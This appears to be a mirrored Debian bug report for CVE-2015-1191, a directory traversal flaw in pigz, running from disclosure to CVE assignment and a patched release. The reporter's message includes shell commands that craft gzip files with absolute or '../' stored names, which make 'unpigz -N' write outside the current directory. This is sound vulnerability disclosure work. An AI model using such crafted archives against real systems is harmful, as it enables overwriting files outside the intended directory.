Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

pigz: CVE-2015-1191: directory traversal vulnerability

Related Vulnerabilities: CVE-2015-1191  

Source

Debian Bug report logs - #774978
pigz: CVE-2015-1191: directory traversal vulnerability

version graph

Package: pigz; Maintainer for pigz is Eduard Bloch <blade@debian.org>; Source for pigz is src:pigz (PTS, buildd, popcon).

Reported by: Alexander Cherepanov <cherepan@mccme.ru>

Date: Fri, 9 Jan 2015 16:42:02 UTC

Severity: normal

Tags: security

Found in version pigz/2.3.1-1

Fixed in version pigz/2.3.1-2

Done: Eduard Bloch <blade@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox

Report forwarded to debian-bugs-dist@lists.debian.org, Eduard Bloch <blade@debian.org>:
Bug#774978; Package pigz. (Fri, 09 Jan 2015 16:42:07 GMT) (full text, mbox, link).

Acknowledgement sent to Alexander Cherepanov <cherepan@mccme.ru>:
New Bug report received and forwarded. Copy sent to Eduard Bloch <blade@debian.org>. (Fri, 09 Jan 2015 16:42:07 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Alexander Cherepanov <cherepan@mccme.ru>
To: submit@bugs.debian.org
Subject: pigz: directory traversal vulnerability
Date: Fri, 09 Jan 2015 19:39:04 +0300
Package: pigz
Version: 2.3.1-1
Tags: security

pigz is susceptible to directory traversal vulnerabilities. While 
decompressing a file with restoring file name, it (unlike gzip) will 
happily use absolute and relative paths taken from the input. This can 
be exploited by a malicious archive to write files outside the current 
directory.

1. Absolute path.

A sample could be prepared in following way:

$ touch XtmpXabs
$ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
$ rm XtmpXabs

Then check it works:

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory

$ unpigz -N abs.gz

$ ls /tmp/abs
/tmp/abs

2. Relative path with "..".

A sample could be prepared in following way:

$ rm ../rel
$ touch XXXrel
$ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
$ rm XXXrel

Then check it works:

$ ls ../rel
ls: cannot access ../rel: No such file or directory

$ unpigz -N rel.gz

$ ls ../rel
../rel

-- 
Alexander Cherepanov

Information forwarded to debian-bugs-dist@lists.debian.org, Eduard Bloch <blade@debian.org>:
Bug#774978; Package pigz. (Sun, 18 Jan 2015 20:33:04 GMT) (full text, mbox, link).

Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Eduard Bloch <blade@debian.org>. (Sun, 18 Jan 2015 20:33:04 GMT) (full text, mbox, link).

Message #10 received at 774978@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>
To: Alexander Cherepanov <cherepan@mccme.ru>, 774978@bugs.debian.org
Subject: Re: Bug#774978: pigz: directory traversal vulnerability
Date: Sun, 18 Jan 2015 21:30:06 +0100
Control: retitle -1 pigz: CVE-2015-1191: directory traversal vulnerability

Hi,

CVE-2015-1191 was assigned for this issue in pigz.

Regards,
Salvatore

Changed Bug title to 'pigz: CVE-2015-1191: directory traversal vulnerability' from 'pigz: directory traversal vulnerability' Request was from Salvatore Bonaccorso <carnil@debian.org> to 774978-submit@bugs.debian.org. (Sun, 18 Jan 2015 20:33:04 GMT) (full text, mbox, link).

Reply sent to Eduard Bloch <blade@debian.org>:
You have taken responsibility. (Sun, 18 Jan 2015 23:21:08 GMT) (full text, mbox, link).

Notification sent to Alexander Cherepanov <cherepan@mccme.ru>:
Bug acknowledged by developer. (Sun, 18 Jan 2015 23:21:08 GMT) (full text, mbox, link).

Message #17 received at 774978-close@bugs.debian.org (full text, mbox, reply):

From: Eduard Bloch <blade@debian.org>
To: 774978-close@bugs.debian.org
Subject: Bug#774978: fixed in pigz 2.3.1-2
Date: Sun, 18 Jan 2015 23:18:42 +0000
Source: pigz
Source-Version: 2.3.1-2

We believe that the bug you reported is fixed in the latest version of
pigz, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 774978@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Eduard Bloch <blade@debian.org> (supplier of updated pigz package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sun, 18 Jan 2015 23:58:51 +0100
Source: pigz
Binary: pigz
Architecture: source
Version: 2.3.1-2
Distribution: unstable
Urgency: high
Maintainer: Eduard Bloch <blade@debian.org>
Changed-By: Eduard Bloch <blade@debian.org>
Description:
 pigz       - Parallel Implementation of GZip
Closes: 774978
Changes:
 pigz (2.3.1-2) unstable; urgency=high
 .
   * Patch(es) from upstream's SCM to solve handling of target file names with
     the -N option (CVE-2015-1191, closes: #774978)
Checksums-Sha1:
 5d8b2cde2befd3f50eb2f2b57095c10aa417fb13 1647 pigz_2.3.1-2.dsc
 49577b466c87ccfd931e3ab3480406085156ecf0 5180 pigz_2.3.1-2.debian.tar.xz
Checksums-Sha256:
 88888e0848d513a55e8ec22d03cf6747f271010019c03dad71160a35a2ee7d5f 1647 pigz_2.3.1-2.dsc
 edcbc59e062416e2307bef52b88a914261b99b2497ffc1ac9cd606f310c9b02a 5180 pigz_2.3.1-2.debian.tar.xz
Files:
 8eb78b4d666b26e8801a44104694218e 1647 utils extra pigz_2.3.1-2.dsc
 ef4c4fab3d625f5b2ee7933bd5557e36 5180 utils extra pigz_2.3.1-2.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBVLw75Gl0DlyzX+w8AQhJYBAAp6mzf0Inigb0rFGKQ+83WwOcvdaS9rT7
gshIL2q8A2RYmOaHqF7Vq7O5reR9AvRJfE0Ukc5PEoOKmj0wn9rwETG2QOmdIIcW
FtNwX0wtDRqO5gqii/bRFSHN573LNMUEmr8ApcEQo0RkYUyrgoN2EzdUGihM0zSn
U7i5ErpiO/kRO2UKLq94cmcY4t0rRo9ITKCPnsbJ93/IRBHDh4n9oxMq886s4YxQ
gADUKfjPpOQWAKCYozFowm1M/D7K2+uW6Jtsd2cE4/uvBQanriS2vScfF1Vkc9Cz
StBgRPwZg/TAXo9lMq53L/HhtFpn0lnUnIm6eF89Ve5lMMnajdc7f7csEpNxwqTr
n1k5dgjYl8cHecroULDPoJ+z0RQ+0LXEHKEi+jOtEnUwbvk+o1IrFq9HvjGiveKf
onZqSmcgvOCtAvQg7QImcdj8BxEDhBk+VtCsJdH4oWh5pVQtLYgZBILccCXIqg/U
gLPdhGEArmDolURlKA1/YNgYGAWVUU5gHQEVe2Tar0Em/oiE/1l+SXmQFFHPMkwQ
8xfEXCxWE70hg69NhnyBCy98cNNDBIk/sA4pmRbJzEIjBTmZS1GmyaZVyBPl0dQ4
mxGjG9AC9Jkn9n2KjMhXVQbG1p9JiFuTvrFs6BuadRpVtZrE1OKH4m++z5KHorYI
oChrHC4bFjI=
=IEco
-----END PGP SIGNATURE-----

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 23 Feb 2015 07:30:15 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 18:15:00 2019; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started